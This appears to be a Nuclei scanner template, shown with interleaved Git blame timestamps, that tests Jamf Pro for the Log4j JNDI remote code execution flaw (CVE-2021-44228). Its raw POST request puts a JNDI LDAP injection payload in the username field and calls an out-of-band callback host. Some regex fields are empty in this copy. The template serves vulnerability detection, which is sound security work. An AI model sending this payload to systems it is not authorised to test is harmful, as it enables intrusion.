nuclei-templates/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml

71 lines
2.1 KiB
YAML
Raw Normal View History

2022-10-21 08:29:33 +00:00
id: jamf-pro-log4j-rce
info:
name: JamF Pro - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK,pdteam
severity: critical
description: |
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
reference:
- https://github.com/random-robbie/jamf-log4j
- https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html
- https://community.connection.com/what-is-jamf/
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
2022-10-25 13:40:49 +00:00
cwe-id: CWE-77
2022-10-21 08:29:33 +00:00
metadata:
2023-10-14 11:27:55 +00:00
verified: true
max-request: 1
2022-10-21 08:29:33 +00:00
shodan-query: title:"Jamf Pro"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
2023-05-03 17:51:44 +00:00
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
2022-10-21 08:29:33 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
2023-05-08 05:37:00 +00:00
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
2022-10-21 08:29:33 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-16 13:32:52 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
2022-10-21 08:29:33 +00:00
words:
- "dns"
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
2023-05-03 17:51:44 +00:00
- type: regex
part: interactsh_request
regex:
2023-05-03 17:51:44 +00:00
2022-10-21 08:29:33 +00:00
extractors:
2023-05-08 05:37:00 +00:00
- type: kval
kval:
2023-05-08 05:37:00 +00:00
- type: regex
group: 2
regex:
2023-07-16 13:32:52 +00:00
part: interactsh_request
2023-05-08 05:37:00 +00:00
2022-10-21 08:29:33 +00:00
- type: regex
group: 1
regex:
part: interactsh_request
# digest: 490a0046304402205b2056f3a84d81394ed947272bb7bc9a6dc51d147245f45d8d2cba5b2e60036002206cffea329b822e38376403acb3ee666baa2a96c4276f08e31e67b2b2e0eb449c:922c64590222798bb761d5b6d8e72950